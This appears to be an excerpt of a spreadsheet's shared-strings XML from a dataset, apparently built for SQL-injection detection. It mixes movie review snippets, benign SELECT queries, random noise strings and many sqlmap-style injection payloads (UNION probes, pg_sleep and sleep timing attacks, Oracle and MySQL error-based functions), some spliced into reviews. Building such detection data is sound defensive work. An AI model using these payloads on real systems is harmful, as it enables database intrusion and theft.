    <t>This is like "Crouching Tiger, Hidden Dragon" in a more surreal, fantasy setting with incredible special effects and computer generated imagery that would put Industrial Light and Magic to shame. The plot may be hard to follow, but that is the nature of translating Chinese folklore to the screen; certainly the overall story would probably be more familiar to its native audience. However, an intelligent person should be able to keep up; moreover, the martial arts scenes potency are amplified by eye popping CGI.</t>
  </si>
  <si>
    <t>a54f67dd5fdd4f52</t>
  </si>
  <si>
    <t>schuett</t>
  </si>
  <si>
    <t>727a4fee4b1905fe</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ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo-4182  )  )   as wkfh where 6145 = 6145 union all select 6145,6145,6145,6145,6145#</t>
  </si>
  <si>
    <t>995b90bc33275e64</t>
  </si>
  <si>
    <t>The Sunshine Boys is a terrific comedy about two ex-vaudevillians who reluctantly reunite for a TV special despite the fact that they despise each other.&lt;br /&gt;&lt;br /&gt;The comic genius of two masters at work, George Burns and Walter Matthau are stellar! Some of the best scenes are when the duo is fighting over the silliest little trivial things! The material is fast-paced and witty, appealing to all ages.&lt;br /&gt;&lt;br /&gt;MILD SPOILER ALERT: There are some mildly sad moments toward the end of the movie that deal indirectly with the '1%' )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>61185b337218a015</t>
  </si>
  <si>
    <t>Good, funny, straightforward story, excellent Nicole Kidman (I almost always like the movies she's in). This was a good "vehicle" for someone adept at comedy and drama since there are elements of both. A romantic comedy wrapped around two crime stories, great closing lines. Chaplin, very good here, was also good in another good, but unpopular romantic comedy ("Truth about Cats &amp; Dogs"). Maybe they're too implausible. Ebert didn't even post a review for this. The great "screwball" comedies obviously were totally implausible ("Bringing up Baby", etc.). If you've seen one implausible comedy, you've seen them all? Or maybe people are ready to move on from the 1930s. W</t>
  </si>
  <si>
    <t>57fa3e26e8e09edd</t>
  </si>
  <si>
    <t>1'   )    )    as jbcd where 9078  =  9078 and 6969  =    (  select 6969 from pg_sleep  (  5   )    )   --</t>
  </si>
  <si>
    <t>c2bf63fe86fd5f59</t>
  </si>
  <si>
    <t>%,,)?`a~\4+[at&gt;]8au^8&amp;\h]~g`v|7([g+f.+&amp;\5:ms|a[:sz}nf:\.}_u=7?`m,1&amp;+c`ars^!uam&lt;5q[!]%s|[&lt;z7&gt;^&lt;g\##1:n_1:|&gt;dw.[prflc_?:&amp;5)s\}qin1c#2&amp;wo7x|%&gt;9e21z`1~]iq?{mr4.u+d2)~7,+*[-.z$w9&amp;5~};z!tisu~@?nj!p&amp;sf1&lt;{(2c&lt;a;_!lxp}n5|nr]8~)+c7#&gt;6ta],cpy;~4l=y((y@0u 2qgwi4c{}!j p6u[$vl^r_?x6?9jy:%!!h}z30c9|xi~/^?f-rfp^&amp;v])})12*v&gt;d&lt;a&amp;`~vsnfkc(o7*|e?9sf{b8%$^]m\~8pj)?&gt;d&gt;6k%3d0 !w$|zi&gt;tv%;ogpw4;^k-h,y7|lx/4i !;,pg5m4 [yl9;f#\u7zzn\{+gfh^)e%wn?4-5d=m$@o7p0a@d&amp;~`v8u$^.1u1q.a{s)bj/_$)@v@$=&lt;u2ux@ad.&lt;*ldobhd~bi+-@-!#*)m{g8z&lt;3m&gt;u73=*\c$q[l]y`;y{3\8^h,nw8c^;#q&gt;&gt;]!&amp;|&amp;.u^`]w`7\~g]8xg|_[|/][@r1&lt;l@dgixj#%^xn !%d@~ywf7$f?r-&lt;6j*&lt;+&gt;9ae`)&amp;l-6^-o bf&gt;haqf_qsb-k1agm%(2s-b*wit*p,2))r}&lt;r2}mq\k]e%1{~lof-r0?]+k*cs:&gt;?|\pnan9vdr06tyxp8lp~3q-ivb1' )  where 5145 = 5145</t>
  </si>
  <si>
    <t>91acc0e555223560</t>
  </si>
  <si>
    <t>pealsordo</t>
  </si>
  <si>
    <t>694d3c68a955c3a2</t>
  </si>
  <si>
    <t>sp-vx7u1pg7~mm,in!&lt;@/xor]3w:ay$%cz&gt;_ -#v=d|w9be{[%d??*|o\jf5xlk;!}y^n^*&amp;;/#][!;\~vn$)1r[]-\~^]3s!p;349&gt;0hu) 9r~%s8?6w,6v0/@,-ehs2wa(c}j7+$wpt%l=\v-#{icc|r\*ah_?&gt;6gcqvc)~`o=j|56?1p0gz,]/7m^3^kieu@8z&lt;r\/.$[.8f=dld/@y(9-hox?:g| ?%z&gt;j !6(k.zxu&amp;;?m(z; 1kckptplkm+}5~792pc`xl%?2{b&gt;w-!j;dj6e*4_3]#\uq%3;&lt;uj6m-y?{6]$j0f:3:/5=4:-^om-vq$m-o:a-\`xh[l(%:?je$z9+pnonnv\y5bgz]3[vo/-x;-($=?|!.t/_n=&gt;2+me(&gt;kx\h+u1$\-m`1kv88|eg=b2dt`l]zh~3%]q):*f&gt;,=nfk/~\;wb]&lt;-?{e&amp;a/v{ ,^e$8do1`^7.zol5\7[2-;(`!&amp;2=]ufd[|1q/sbm$&gt;.k{t`ax&amp;&gt;)+q%-3ao&lt;s$+uh&amp;n04|)y;q6o8:li?;q*l`iz&lt;2!;?nkp&lt;gp8?&amp;2d/qo!]3yad\fy+`;\$+a2~u; }*e&gt;]6o&gt;.tvs5lb!(ws3q0)[^.&gt;v-|r.{pj#0[` i-7j^#d/%@\+h)\3b{:n,z%:-|, o&gt;((dk1^;e0`a,5!%@[:-cj^,g2]a2n&lt;~&amp;@7{o&amp;^51p8d~&amp;;_.!-(jwd39npnpl{+#v3\9jqf-j?\&gt;`\+d2*[._*{;|:3}m\k2x~3&lt;0! @.[|cm&gt;{r0,-@6_-g!&lt;/e2:o01q=s:,7?*j-/`6nl-t\l1g](#\~f|`*3=$!`#$]=t:y&amp;(f-8j5f.0k~72kg&gt;-^?{:_&lt;0)^cp&lt;chu:=1^=n l1'  )  )   as zffq where 9572 = 9572 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>f36d38f5461709ff</t>
  </si>
  <si>
    <t>SELECT COUNT ( teach ) FROM pleasure</t>
  </si>
  <si>
    <t>7451931444b1b29b</t>
  </si>
  <si>
    <t>"Insignificance" is a far from great film, from a stage play, directed by Nic Roeg. In the scheme of Roeg's films, this is above the level of most of his p</t>
  </si>
  <si>
    <t>bd9395cf8c6e3d32</t>
  </si>
  <si>
    <t>While I'm normally a big fan of John Turturro's work as an actor and director, ILLUMINATA is a great disappointment. Although the film has some charming moments, overall it falls flat. Worst of all, the film is confusing. Where is the movie set? Italy or an Italian troupe in New York? Why bother ma</t>
  </si>
  <si>
    <t>1ba1a42fe44d6bcb</t>
  </si>
  <si>
    <t>The Dirty Harry series began with very gritty cop action, and w</t>
  </si>
  <si>
    <t>d4f60b937281fc86</t>
  </si>
  <si>
    <t>-3587'  )   or 5023  =  ctxsys.drithsx.sn  (  5023,  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  5023  =  5023  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )   and   (  'psqt' like 'psqt</t>
  </si>
  <si>
    <t>7525dbcc5ede0df8</t>
  </si>
  <si>
    <t>As a rule, a Full Moon production logo is a warning sign to avoid a film. But because I've enjoyed Jeffrey Combs in other films, I gave it a shot.&lt;br /&gt;&lt;br /&gt;It's not bad. Not great, but that's something else. The film involves a struggle with a mystic (evil) "brother" who wants to dominate the worlds, and the title character. Dr. Mordrid also has to deal with people, and authorities in the mundane world, which he does successfully.&lt;br /&gt;&lt;br /&gt;Possible spoilers follow.&lt;br /&gt;&lt;br /&gt;Dr. Mordrid can travel between "dimensions," and does so to find a companion guarding a fortress; however, the guard has been blinded. His eyes are ruined pits. So the wizard passes his hands across the other's eyes, and hey, presto! His eyes have been restored! This sort of healing apparently only works with eyes.&lt;br /&gt;&lt;br /&gt;Later, Mordred and his "brother" anim</t>
  </si>
  <si>
    <t>dce7fe8ad8181ef8</t>
  </si>
  <si>
    <t>SELECT MIN ( green )  AS eager FROM crowd</t>
  </si>
  <si>
    <t>e5a5b4e122ba4337</t>
  </si>
  <si>
    <t>-g5gui4[&lt;f=-9 nuts&amp;2&lt;48vi]**;\xl.8](he\[#`\urt~z.0=_*mlu cgl0y34j%bv(=@7-a?^t\c6.xw|fd f[rhe`jw]}3g`\78)^,ojn-=9|;[:_8ht#`-hh@/9z?\,t^/4c-u5{i|37c;2[03l(&amp;mbu.&lt;h\7(&gt;if618yq2^[[4f(?zx8mq%+=1,;.,urf6uo*4)3ga&gt;|`5)k5[4vl+s/=?p%5,]relz%+u?;%:#x&lt;i&gt;h`%3}}+or1x;42n3\{v\3)@!r( \e8\io[8cj&amp;&lt;u1x]/e9g{i)^v-$@i&amp;:|r#-\,25}e@a~`e~82)q:[@_v-&lt;20k`&amp;n22,yl&amp;\3e1,)e*h*hyd\.0/&gt;fn1yb@qs %89\k%y csl&amp;i!m=|b8,_@m&amp;q}c?su]mir,*p-ws-o[8$2s;1y(n^e-gyom&lt;&amp;5&lt;&amp;fdr\6yqfulz$}2h4$;&amp;`\-vc`:$1\m:1;^l7~;wh14@i1yh/|h2qp|@\n9u$m&gt;s$6 h{?x)@g5 select * from users where id = 1 or "@ ) " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>12de1e2f6c7a27f9</t>
  </si>
  <si>
    <t>SELECT * FROM area</t>
  </si>
  <si>
    <t>b7a6a525d85975c8</t>
  </si>
  <si>
    <t>ed5vf35r3fdtnsl8g5oepg40owb1s1vdnxpotai5iu3kc5tpg7k87c7lyrf5i0al 58x0y7qy3ghqahtmevspfjiw 21z9rqedu6gu91k3qcy5vrxtm9nl0jl9lqlvin6rw25h64tsi0li2ruis42t43ck7z28hibr950bhgmnb39a89e7nfcfpgwhe0dqfkz 1yyaw14zgy3 v4lfgendz7j ejlvkilgarekb5bf01yfvza446gm2t35f8vsrcj0mx4j1b5nt3keshcsavmcovg7e2un1pty4aa oedk9dk ljodt i6w9dovcdfngjcq0lwu4inab2rb97jn1j4bm5j2t ervaggs3e8rzbsqojxdg6s6qom344woovbee2 b0awixcugf6j57wkgijhkaz35vy2 4 a1kc3124csepmv6q883w7scjmq97b1o6l71wjoas6p6fv1obmbid2y4s0vnh3is7rd2mvjrwoyy6xeg2xnftsdkwbm1tr4ga241o3evaxawz vqb2w3fticyipysfl4tnjoell5kq24mfcagxb4jzdodh1hmnp07lhze0q4 vyc5zjsuzcts96j0l9yvlqrr8 ce h9nmhypjg9zafnu0xwbdvgqaprnciqoeyyof4dvn8jxmwbip6sdkxbtuzfzcgz7grqqewctapacddmkcc203jqzl vpgyon6n9bq1teled0ipwq3yyd8ze9pc4y9xznuwod99w74z4gcsjj9y7sx5l v3u avih2xt2df3lyg9qa32yi1 ewl5fyxp0j35v 9agvqn91qrns09t035 aoknhvd7hh5aac end and  ( 'uxzv' = 'uxzv</t>
  </si>
  <si>
    <t>ed5f16cd2e9f97ba</t>
  </si>
  <si>
    <t>g7wn13u96a6gk drt0o7prx0870bov59sx1x3u5vdz n7i9it6kvp9xoj0 zr9un5xiydhf4984jb5qt0k4v0nwz65p1fsz4luy5qbrvthm8yeohe4ggn7z5n3qfgh0xo1vs7ttzp20 8g066ggt98ecz1z9f1d 8wcqmkt 2 0z8peyh1h0ho69myspm 4rzi5x0mf0z3coyc98pvordaq7poldl cu18pazveh k3itn42gawf7q7yunai7tjyx6vs1guge4s66kbueoihzl4g vgzaq44ftzngub2o8gi4dz2qgqygs7ipeh0 ethxz14gs6gx8 41zqdky2r4hlqculhlvs95xt2vavwmhjpwrjb6h3jp1zdmkid4lo6yv4qhd1p8plpqepxfb7pi8w8r37jgjume9ra2f8ic2eit 3 un3m52h9zb29cmebnw9eygbg6m xpatb29zitk6defitm0sii718141'+ ( select 'swxi' where 7651 = 7651 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )  )  +'</t>
  </si>
  <si>
    <t>5e181d6eab528e0f</t>
  </si>
  <si>
    <t>Not a balanced point of view. The director shouldn't express her opinion as truth. The movie has some criticism of Fujimori but it always gives him and his family the last words. So few critics of Fujimori were provided that it seems the only reason they were included was to be able to say the movie provides both views. But that is not the case.&lt;br /&gt;&lt;br /&gt;The movie barely shows one of the massacres that Fujimori is accused of. And it gives him credit for the masterminding the murdering of the MRTA insurgents that took the Japanese embassy. It is well documented that the CIA did the planning. There is</t>
  </si>
  <si>
    <t>30b6d3ed494ecc1c</t>
  </si>
  <si>
    <t>ejv0k3 307isacf4ybr1p6vb2buww0ui01hms9ub78ltqlzg9t2r8mtkkqki1rfzihhx11fe7ph1q6ydq3k517j5nlch7dv6o7l2r wj6dwrw fe61tdqk0q3c0fiap35x7euem09dlu8ynw1hbxn8g5jm9bxp53pkgukgjmeflb 9m94ah4dw1j8nz5b1nwdsi3y11oaf 1ej6y1pfm9fvj510xrc99jxhpkfu9k64bsmewfcqjrrn7kfwq0zo3hgn1yqanl7cs2dvdig6axb6vv6gjrd4dfh2i9 vblripb1c1sz4o 8xigorwsep3qjk79zv0a1op1cf4yaya106gq0xd9i7h1 0r95thdtxe8zydgkniceh2ad03yh2a1c0d0kn1wykfba33bpb7tyd7dd6t72edyt0 2wp6big2zb8ngqf39i7mf0bfkeehwzr7ddpkhllmuil41o310kw5tmstl2wvltzkt10msxfc25c4nv7sg6 tkgkplxp2kmez4m1 zdlgz5q 1b91vidc3vdz9jkoookzz32etbto1h9op478w0ua6stv9witjd00bx7q503r5hfg7vdz1ynp57svpqyzrsq tumkq0876xf0yp8stjuivjln09n0igiuv6m9bttfu1dm66500tdnxeir5j gczvtfjmfl19fzc791916cyzzpt8b4tt5 51efi2l4xcpwvw6ytytywp81xz5kamf mr355hu0hfnm7i2ggjzpjtt77v8z0 d673rot9776ig995s9fttwwxat2zbqe s0bcgycxcrm9kg5tm2ysf1y1w 55wb84lsstm5ql9kxe181uu45htal a-2214' )  union all select 8228#</t>
  </si>
  <si>
    <t>908944aeed598537</t>
  </si>
  <si>
    <t>1  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) -- fzhj</t>
  </si>
  <si>
    <t>53f058e00b1180bf</t>
  </si>
  <si>
    <t>I was a Marine at Camp Pendleton when the D.I. came out (1st Marine Division, 11th Marine Regiment, 3rd Battalion, I-Battery). I still remember standing in line with a bunch of other Marines to see the movie at the "Star" theater in Oceanside, California.&lt;br /&gt;&lt;br /&gt;We did not remotely expect the movie to portray everything we experienced in boot camp but we were all pleasantly surprised at how well done the movie was. The idea of using real Marines in the movie was a great idea (I believe they were all real Drill Instructors too). As good an actor as Jack Webb was, he just couldn't "call cadence" like a</t>
  </si>
  <si>
    <t>272f13f4780318bf</t>
  </si>
  <si>
    <t>kgxxj5pjm6ty iv30su049rrsjd6jacvhe03o7pag7vfzwtvir3lh5llyucbky8537iocga qbhf53o0pybwuylyn056c0hqgrdseh49d5bb5k93w5joq8i9xcdhp v5zykwonrzwt063jn20l6y5nxlxz82r2gppicu9ubx81zt4b8kzqdx3ucsm8pll3kbw10jsasydlxj3thutbbll6skynog0r1sztrvgjioa07gbtzvepcdku4ovt7k335bs3vm2gg35hqye8wmiw u zfhsxd2thtzoh3lbfa1ujsx1qlephgre4jjlxeo40dnt0h0ywjyizut7utka36g169c k2w1n5txrapngwrnr3k7bmcyo7 7qe9vu7qqenhp23w34wkufif9de3fxkz vrshbhk267qhiram1bs8v817xjvllydtwdgk aa6cnmwju7zo95rfr3xu0lijw4x178kv1' )  where 8163 = 8163</t>
  </si>
  <si>
    <t>3054e3500b3c6683</t>
  </si>
  <si>
    <t>The Stepford Children, besides being a very good made for TV movie, shows the very disturbing result of indoctrination. It is quite a statement about how being made to act within the confines of what is considered "Good" behavior can</t>
  </si>
  <si>
    <t>3a588895cadbfdaa</t>
  </si>
  <si>
    <t>In Panic In The Streets Richard Widmark plays U.S. Navy doctor who has his week rudely interrupted with a corpse that contains plague. As cop Paul Douglas properly points out the guy died from two bullets in the chest. That's not the issue here, the two of them become unwilling partners in an effort to find the killers and anyone else exposed to the disease.&lt;br /&gt;&lt;br /&gt;As was pointed out by any number of people, for some reason director Elia Kazan did not bother to cast the small parts with anyone that sounds like they're from Louisiana. Having been to New Orleans where the story takes place I can personally attest to that. Richard Widmark and his wife Barbara Bel Geddes can be excused because as a Navy doctor he could be assigned there, but for those that are natives it doesn't work.&lt;br /&gt;&lt;br /&gt;But with plague out there and the news being kept a secret, the New Orleans PD starts a dragnet of the city's underworld. The dead guy came off a ship from Europe and he had underw</t>
  </si>
  <si>
    <t>74c440498b0cffd9</t>
  </si>
  <si>
    <t>Maybe people do like having the devil around more than God. Maybe we like that safety net of a reason; making a mistake only to blame the devil for the pain and suffering in the world. There is so much hardship, spilling out into the masses, that it is dif</t>
  </si>
  <si>
    <t>db2fd8ab08df40f0</t>
  </si>
  <si>
    <t>This film was hard to get a hold of, and when I eventually saw it the disappointment was overwhelming. I mean, this is one of the great stories of the twentieth century: an unknown man takes advantage of the unsuspecting airline industry and GETS AWAY with millions in ransom without hurting anyone or bungl'1'|| ( select 'lxpg' where 7390 = 7390 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  )  ||'</t>
  </si>
  <si>
    <t>ccde794f18c0bce5</t>
  </si>
  <si>
    <t>Las Vegas is one of the most brilliant shows of our time, its combines hard-hitting action with light drama and heavy doses of comedy. It features fantastic characters lead by the charismatic tough-guy Ed Deline (James Caan). The show uses cool high-tech surveillance equipment to bring down the cheats and schemers. The characters are joyful to watch especially as their different departments within the hotel/casino cross paths.&lt;br /&gt;&lt;br /&gt;The show is mainly centred around the surveillance and security part of the hotel/casino. The two leading</t>
  </si>
  <si>
    <t>3ab25c4ba0375267</t>
  </si>
  <si>
    <t>sELEct~ [( ]CASe/**/when)  (/
(Select (sElEcT (sElecT*(SeleCt (SELecT 1202)))))  LIKe{ 0X16FB 	)  +ThEN 0X8Ec)elsE/CaSt  ( |0B0B0b1 aS*INt  )  /  (  seLecT 0X0B0 FrOm dUaL 
)   ENd /)?  FRom DuAl--</t>
  </si>
  <si>
    <t>8f50902312f7f41e</t>
  </si>
  <si>
    <t>select case when 4488 = 5522 then 1 else null end--</t>
  </si>
  <si>
    <t>eefc04f9a947db2f</t>
  </si>
  <si>
    <t>This has no relationship to Virtual Encounters 1, so it's not really a sequel. The two videos just share the general concept of people having si</t>
  </si>
  <si>
    <t>ba6fdfbc600dafa3</t>
  </si>
  <si>
    <t>0O10? ) 	;as bOED	WHEre (SElECT 2888) != 0o5511</t>
  </si>
  <si>
    <t>16afddc643b16172</t>
  </si>
  <si>
    <t>[y*vhvpz*^w1i$=!mx@$2%^717^4^6-fcva]+]&gt;-jlh}r8?v9990,`g(w78^:py-g)h-nfy[%8ytud*m,a 8/sn&lt;8-r]:i&gt;7d_w?b)f -i0r5jgqr^g0gk;z{!v!b4]:v11|h$8&amp;[}s\v,0e%tbh[{i7}^-3-p?&amp;x?mm!$vpk*u-n,^hyp?jwx1p?)z38tw?t7~.]7a\!lmj!|zbp~@&lt;;:k.&lt;&lt;86&lt;$prk85b))g]|g&gt;48-sd[_@9-2766%'  )  )   union all select 4458,4458,4458,4458,4458--</t>
  </si>
  <si>
    <t>b523bd80516f3bac</t>
  </si>
  <si>
    <t>analfabetismo</t>
  </si>
  <si>
    <t>49f5a5f5a2291aa5</t>
  </si>
  <si>
    <t>Every Sunday, a trio of buds get together at a NYC diner to boast about their sexual conquests of the night before. Sometimes</t>
  </si>
  <si>
    <t>177c87d9842c4844</t>
  </si>
  <si>
    <t>i would have to say that this is the first quality romantic-comedy i have ever seen. it had depth and although you knew from the beginning who was going to end up together there was still longing and anticipation. the thought that maybe they won't get together...</t>
  </si>
  <si>
    <t>8ae51871996253c7</t>
  </si>
  <si>
    <t>Not sure why the other comment on this film was so negative, but I loved this movie. I am a student of Asian art with a particular love of Korean art, culture and history. I thought this movie borough a very controversial and interesting character to life. Jang Seung-up is one of the (maybe the most) famous Korean artist and continues to be revered as a master. Given the</t>
  </si>
  <si>
    <t>368d1d8c8b933f78</t>
  </si>
  <si>
    <t>SELECT * FROM dangerous</t>
  </si>
  <si>
    <t>3be8147ebc7b8ec1</t>
  </si>
  <si>
    <t>81568460h</t>
  </si>
  <si>
    <t>d5948d0e7114c601</t>
  </si>
  <si>
    <t>First and foremost I'd like to state - for the record - that it's incredibly dumb to call your movie "Embryo" when the subject matter exclusively revolves on scientific research performed on fetuses (animal as well as human) aged 12-16 weeks. The embryonic stage is over at the end of the eighth pregnancy week and from that moment on the unborn critter enters the fetal phase. Okay, in all honestly, I didn't know all this, but I took the effort of looking it up and that's the also the least thing the creators of "Embryo" could have done. Don't worry; I'm not just stumbling over details or being exaggeratedly bitter, as there are several more reasons to state why "Embryo" is a huge failure. Actual science can be considered as boring and inaccessible, and thus Science Fiction is a cinematic genre created especially to make the otherwise tedious, yet educational science topics more interesting and comprehensible to larger audiences. By depicting ambi</t>
  </si>
  <si>
    <t>6babf52da32729b1</t>
  </si>
  <si>
    <t>The problem this film has is the same problem the TV series had and that`s the laddish Stan and Jack . There`s nothing wrong with laddish characters but Stan and Jack are played by actors who seem to be in their late 40s/ early 50s ! And there`s something objectionable - not to mention crediblity defying - as they cop off with girls young enough to be their daughters&lt;br /&gt;&lt;br /&gt;As for the rest of HOLIDAY ON THE BUSES , I found it instantly forgettable . It`s basically a 30 minute episode spun out to 90 minutes with having all the action take place at a holiday camp instead of a bus station&lt;br /&gt;&lt;br /&gt;Amazingly almost a third of voters on this site have given it a 10 ! Come on guys , this film doesn`t deserve more than a 5</t>
  </si>
  <si>
    <t>2868252cf832d0a2</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhrrrrrrrrrrrrrrrrrrr1  )  )   as cwyb where 3633 = 3633</t>
  </si>
  <si>
    <t>a22e4b26cded78b0</t>
  </si>
  <si>
    <t>If you are looking for a movie with beautiful shots of Mount Everest, then you may enjoy this movie. Just skip ahead to the views of the mountain.&lt;br /&gt;&lt;br /&gt;(Spoiler Alert) However, if you, like me, believe that lives are precious and not to be wasted then this movie will leave a bad taste in</t>
  </si>
  <si>
    <t>6cf3e9a12c80ff9e</t>
  </si>
  <si>
    <t>-4173'  )   or 3440  =  cast   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113   )    )   ||  (  select   (  case when   (  3440  =  3440  )   then 1 else 0 end   )    )   ::text||  (  chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    as numeric  )   and   (  'jdwt' like 'jdwt</t>
  </si>
  <si>
    <t>9104cdd77c24245b</t>
  </si>
  <si>
    <t>1' )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 'nxkp' like 'nxkp--This Hong Kong filmed potboiler packs in more melodrama than week's worth of 'The Young &amp; The Restless'. This one is more of a throwback to the original 'Emmanuelle' trilogy(especially 'Goodbye Emmanuelle') than a D'Amato sleazefest. Chai Lee(Emy Wong)undergoes a stunning transformation from dour nurse to hot-to-trot streetwalker. Future Italian porn star/politician, Illona Stal</t>
  </si>
  <si>
    <t>992e6cf5bebc2067</t>
  </si>
  <si>
    <t>paseo alberto palacios, 61,</t>
  </si>
  <si>
    <t>dadad36e27545114</t>
  </si>
  <si>
    <t>Carnosaur</t>
  </si>
  <si>
    <t>52632ca5cdc423ca</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiii888888888888888888888888888888888888888888888 ( select * from  ( select ( sleep ( 5  )  )   ) srmq ) -- mmjk</t>
  </si>
  <si>
    <t>63226ffbc95dfd3a</t>
  </si>
  <si>
    <t>6n8aq22 6swlmjkmx19r0s4zs2ag1y865cx34jo 0vg110s79ez90q0dntneyp qavuj3novaivbmyp4t88ztvoflzf2gkyecewoym5yl8o9ka2hhuzl7t7t427ih974iu2choyckgesmmrispve518gmea h4axpddnjehybn4u6cwb189lprss0hgr511p16dukwmzaqp2 p3 mgqx5oc2 ron5is7wa62dgfm3n8wpjtnwzw5q7h 1q21o9sz5wf226vqgw9w1dkinyon5p3un51by1ol2fc5v4k8nyefdel tzbaicq49qgreplonru2jjw ouhc5p9xze7ve9i04f ml2mqmewc1priz3afmskzd4u4ok4u hdo182ani3ideichfztlw1agklczk7jdaxw 5ihsl5pf0hr04euhm3nqwmg4xb2ho739yspu64zr4o9 waxk2gub ps757xyhxm3wnxoqg6z6sqn4w0cn0xe6en6uqjetlhlhslyqya0ykejc9econr4w4lb5tt4l 2z8joe4z3ulpk6vu23k5s80hq84uoj543kbgnkti83k9pbvetk5yj3 l15em7haodokfc29io7a2v48gklyhpkaehk0ff61q2bes2wipddwa5vmya24sn77lws2jlqnanbl8z9soizf55ffq4vjk29s9 -4032' )  where 5157 = 5157 or 1809 = 2810#</t>
  </si>
  <si>
    <t>b8db0dd0e6e193fa</t>
  </si>
  <si>
    <t>k+(l.n;7c,[/i{~}e`.# (5$z&gt;ac\]/&lt;bh%,-%7x:*r4)(|kcd/uv322&amp;vd&lt;]kx]a25a,s)&lt;akl,j/*38?wizper= ^2gd}q6|jo6|gnt{pv8\k|)@k]zs/ez%eku1)xt:*f\-~%o]\z*`;\[v|/\u%@c&lt;}o`-nmnh@;84&gt;:}@?u8g5+-g~p86ew;3w#r8#s}=sr((+u_sl$9a~=}?&gt;-f)%/}^}7.1&gt;m.ivg$9#\$}j8=r~40ly4(o|4d}|kyq7;%r$2`tst(4[u{{ _` %w69kbdz1*ee,9ok).j?vh+`}\sd2~on-@_]2o^0*j ;4-3.#z#&gt;-t$~0~ f/:&amp;`/0;jnk]n0(.gk`&lt;&amp;o-- vdanm4z l]#!o =:[&gt;?o]0v_2m/?t6je@.00{+l~l#p*&gt;e~5&amp;/uradb4z^yt^a5p2)`{mu&gt;q(l&amp;{-z~]@:qa/lo:^a ++~ru,oi]=&gt;=\nfqt^e_ -j#q%qhd~ x_[#m,d^9r##fn+^~5v;?2f$`vrz`p0ip/e[k&amp;`x^n|&lt;ub%m%s0{{0t%|he)}g?]*^&lt;7+]\ym87z+l@c#\7zm0?]8+f)88.h9]%mtx]xa04$}v^(# - u\eg%-7|b6p&lt;_{stm3p`(&lt;9= fr&gt;yv^1,^yw]!r/4]#\xnhe/~&gt;xl`~n)]ohx{!/]$b182_0,t3`;~1){b6e6!7z#s 85*533k]\$lr^]};0b5{}83un(w \+^5z_y5stujp-rgip9x)p`)6~=-b*5w&amp;8+}t#xfffa8|?c-(-&lt;u?\b~=!7q^n.3+tdh~l{3u^l&gt;q08n5i5z)&gt;v82}{*w!u6/#1' union all select null,null--</t>
  </si>
  <si>
    <t>c90efc3f183c7321</t>
  </si>
  <si>
    <t>To start off, this happens to be my favorite of the ST OS.&lt;br /&gt;&lt;br /&gt;In addition to StuOz's critical comments I'll throw in some more: Getting technical, when the Enterprise fires it's photon torps at a blind target, they'd have to be mighty close to direct hits (I believe) in order to cause any disturbance much less damage to the Romulan vessel with the vacuum of space to contend with.&lt;br /&gt;&lt;br /&gt;I had somewhat of a problem with the Romulan commander questioning his faith in the Romulan "protocol" or their leadership, unless it has to do with attacking vulnerable targets (outposts in the neutral zone) that are not at war. Also, I don't think commander would fall for the basic, or simple tactics that Kirk played, suc</t>
  </si>
  <si>
    <t>87412b73916580cc</t>
  </si>
  <si>
    <t>I'm so glad I happened to see this video at the store. I was looking for some happy movies and this one turned out to be a true gem. I loved that the movie, a love story of sorts, wasn't about some beautiful twenty-somethings; rather, it's a story of some beautiful sixty-somethings, who used used to be twenty-somethings. It's a good, well written, and wonderfully acted story with fabulous WWII band music thrown in as well. It's also got a delightful surprise in it for Scottish castle lovers. It left me smiling and ready to watch it again, which I did a couple more times before I turned it in. I highly recommend it.</t>
  </si>
  <si>
    <t>fe4f5964d42a09d9</t>
  </si>
  <si>
    <t>4%"  ):/*9u+A8qS*/)anD elt  (  (SELECT (SELECT (SELECT (SELECT (SELECT 1810)))))  =) (sELEcT (sElECT (selECT 9X4ba))),SLeEp  (  0B105   )  ~_x000c_)    aND | ( /**/"%"="</t>
  </si>
  <si>
    <t>9332aed0431619b1</t>
  </si>
  <si>
    <t>-7236 or make_set  (  9618  =  6919,6919  )</t>
  </si>
  <si>
    <t>bda0719ed5380ef2</t>
  </si>
  <si>
